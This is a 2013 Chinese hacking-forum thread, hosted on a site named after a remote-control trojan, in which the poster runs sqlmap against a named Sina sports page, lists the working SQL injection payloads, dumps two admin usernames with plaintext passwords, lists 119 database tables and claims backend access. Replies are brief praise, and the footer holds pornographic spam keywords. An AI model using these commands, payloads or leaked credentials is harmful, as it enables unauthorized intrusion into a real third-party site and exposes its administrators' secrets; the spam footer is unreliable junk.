灰鴿子遠程控制軟件

 找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

查看: 21545|回復: 9
打印 上一主題 下一主題

新浪的一個Sql注入,可進入拿后臺

[復制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
發(fā)表于 2013-8-9 22:16:04 | 只看該作者 |只看大圖 回帖獎勵 |正序瀏覽 |閱讀模式
root@kali:~# sqlmap -u "http://others.sports.sina.com.cn/cva/paper.php?id=264" --dump -C "Manager,PassWord" -T "cva_manager" -D "otherssports"
新浪的一個Sql注入,可進入拿后臺


    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


  starting at 18:10:41



[18:10:41] [INFO] resuming back-end DBMS 'mysql'

[18:10:41] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=264') AND 5215=5215 AND ('eOJb'='eOJb



    Type: UNION query

    Title: MySQL UNION query (NULL) - 36 columns

    Payload: id=-7030') UNION ALL SELECT CONCAT(0x3a786c763a,0x424f4778474d484c6157,0x3a63707a3a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=264') AND SLEEP(5) AND ('grRQ'='grRQ

---

[18:10:42] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL 5.0.11

[18:10:42] [INFO] fetching columns 'Manager, PassWord' for table 'cva_manager' in database 'otherssports'

[18:10:42] [INFO] the SQL query used returns 2 entries

[18:10:42] [INFO] retrieved: "Manager","varchar(20)"

[18:10:42] [INFO] retrieved: "PassWord","varchar(20)"

[18:10:42] [INFO] fetching entries of column(s) 'Manager, PassWord' for table 'cva_manager' in database 'otherssports'

[18:10:42] [INFO] the SQL query used returns 2 entries

[18:10:42] [INFO] retrieved: "cva","fgrtert$4b345b"

[18:10:43] [INFO] retrieved: "cvadmin","fdgest34534sdftt54dg"

[18:10:43] [INFO] analyzing table dump for possible password hashes            

Database: otherssports

Table: cva_manager

[2 entries]

+---------+----------------------+

| Manager | PassWord             |

+---------+----------------------+

| cva     | fgrtert$4b345b       |

| cvadmin | fdgest34534sdftt54dg |

+---------+----------------------+




web application technology: Apache

back-end DBMS: MySQL 5.0.11

[18:06:26] [INFO] fetching tables for database: 'otherssports'

[18:06:26] [INFO] the SQL query used returns 119 entries

Database: otherssports                                                         

[119 tables]

+------------------------------+

| admins                       |

| admins1                      |

| cba_double                   |

| cba_member                   |

| cba_member_info              |

| cba_result                   |

| cba_result_data              |

| cba_result_team              |

| chels_fixture                |

| chels_mail                   |

| chels_news                   |

| chels_picture                |

| chels_player                 |

| chels_player_club            |

| chels_player_season          |

| chels_score                  |

| chels_user                   |

| chels_word                   |

| countrystatisticmedal        |

| cva_area                     |

| cva_groups                   |

| cva_league                   |

| cva_manager                  |

| cva_match                    |

| cva_match_0809               |

| cva_match_0910               |

| cva_match_bak                |

| cva_member                   |

| cva_member_0809              |

| cva_member_0910              |

| cva_member_bak               |

| cva_para                     |

| cva_result                   |

| cva_result_0809              |

| cva_result_0910              |

| cva_result_bak               |

| cva_team                     |

| cva_team_0809                |

| cva_team_0910                |

| cva_team_bak                 |

| doha_country                 |

| doha_member                  |

| doha_result                  |

| doha_sports                  |

| dpool_check_db               |

| fivb_chinese                 |

| fivb_match                   |

| fivb_playerorder             |

| fivb_playerorder_1           |

| fivb_rank                    |

| football_news                |

| goaltv_login                 |

| guess_answer                 |

| guess_news                   |

| guess_question               |

| guess_title                  |

| guess_user                   |

| guess_user_ans               |

| head_2_head                  |

| head_player                  |

| historymedal                 |

| historymedal_bak             |

| historymedal_copy            |

| historymedalteam             |

| iaaf_match                   |

| iaaf_record                  |

| iaaf_result                  |

| inter_allscore               |

| inter_chinese                |

| inter_match                  |

| inter_news                   |

| inter_pic                    |

| inter_player                 |

| inter_playerinfo             |

| inter_user                   |

| ittf_live                    |

| ittf_player                  |

| key_channel                  |

| key_record                   |

| key_word_url                 |

| live_photo                   |

| live_sports                  |

| match                        |

| match_score                  |

| match_team                   |

| match_type                   |

| mix_children_record          |

| mix_children_user            |

| personstatisticmedal         |

| rank_atp                     |

| rank_atp_d                   |

| rank_atp_date                |

| rank_atp_prize               |

| rank_bmf                     |

| rank_bmf_d                   |

| rank_bmf_date                |

| rank_cttsl                   |

| rank_fifa                    |

| rank_golf                    |

| rank_ittf                    |

| rank_link                    |

| rank_word                    |

| rank_wta                     |

| rank_wta_d                   |

| rank_wta_date                |

| rank_wta_prize               |

| record_swimming              |

| record_swimming_bak_20110106 |

| reporter_user                |

| shidefc_user                 |

| team_player                  |

| tennis_live                  |

| tennis_match                 |

| tennis_news                  |

| tennis_player                |

| tennis_schedual              |

| tennis_user                  |

| tennis_user_match            |

| tennis_user_player           |

+------------------------------+


測試可以成功進入后臺
評帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
回復

使用道具 舉報

10#
發(fā)表于 2013-12-24 19:09:51 | 只看該作者
好深奧啊。我是來拿分的!
評帖賺銀幣(0) 收起
回復 支持 反對

使用道具 舉報

9#
發(fā)表于 2013-12-17 17:40:17 | 只看該作者
好  真好   我想下
評帖賺銀幣(0) 收起
回復 支持 反對

使用道具 舉報

8#
發(fā)表于 2013-11-17 17:44:07 | 只看該作者
天啊  一點都看不懂 我真是菜鳥得不能再菜鳥了··
評帖賺銀幣(0) 收起
回復 支持 反對

使用道具 舉報

7#
發(fā)表于 2013-11-14 16:07:11 | 只看該作者
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
評帖賺銀幣(0) 收起
回復 支持 反對

使用道具 舉報

6#
發(fā)表于 2013-8-31 10:21:57 | 只看該作者
樓主用的是什么掃描器?
評帖賺銀幣(0) 收起
回復 支持 反對

使用道具 舉報

5#
發(fā)表于 2013-8-30 15:22:57 | 只看該作者
不錯不錯不錯不錯不錯學習一下
評帖賺銀幣(0) 收起
回復 支持 反對

使用道具 舉報

板凳
發(fā)表于 2013-8-14 10:48:49 | 只看該作者
不錯不錯不錯不錯不錯學習一下
評帖賺銀幣(0) 收起
回復 支持 反對

使用道具 舉報

沙發(fā)
發(fā)表于 2013-8-13 18:30:19 | 只看該作者
不錯 學習了
評帖賺銀幣(0) 收起
回復 支持 反對

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規(guī)則

Archiver|手機版|小黑屋|灰鴿子遠程控制軟件|灰鴿子遠程控制軟件 ( 魯ICP備14000061號-4 )

GMT+8, 2025-3-13 11:09 , Processed in 0.079757 second(s), 42 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復 返回頂部 返回列表
主站蜘蛛池模板: 国产免费无码一区二区| 无码中文字幕乱码一区 | 无码国产精品一区二区免费16| 亚洲精品无码AV中文字幕电影网站| 国产精品亚洲专区无码牛牛| 无码国产精品一区二区免费3p| 性色AV无码中文AV有码VR| 亚洲精品午夜无码电影网| 国产精品va无码二区| 久久久无码精品午夜| 亚洲成av人无码亚洲成av人| 黄A无码片内射无码视频| 亚洲Aⅴ无码一区二区二三区软件| 无码视频在线观看| 熟妇人妻AV无码一区二区三区| 国产精品无码av片在线观看播| 亚洲国产超清无码专区| 亚洲AV无码成人精品区蜜桃| 无码精品人妻一区二区三区AV| 无码办公室丝袜OL中文字幕 | 中文字幕无码不卡免费视频| 亚洲AV人无码激艳猛片| 精品人体无码一区二区三区 | 亚洲AV永久无码精品| 久久无码专区国产精品| 国产成人无码专区| 无码激情做a爰片毛片AV片| 亚洲成av人片天堂网无码】| 久久AV高潮AV无码AV| 人妻无码视频一区二区三区 | 亚洲人成人无码网www国产| 精品久久久久久无码中文字幕一区| 亚洲精品无码久久久久久久 | 国产精品无码DVD在线观看| 午夜亚洲av永久无码精品| 一本之道高清无码视频| 精品无码中文视频在线观看| 国产高清无码毛片| 亚洲欧洲美洲无码精品VA| 亚洲AV无码国产精品麻豆天美| 亚洲AV永久青草无码精品|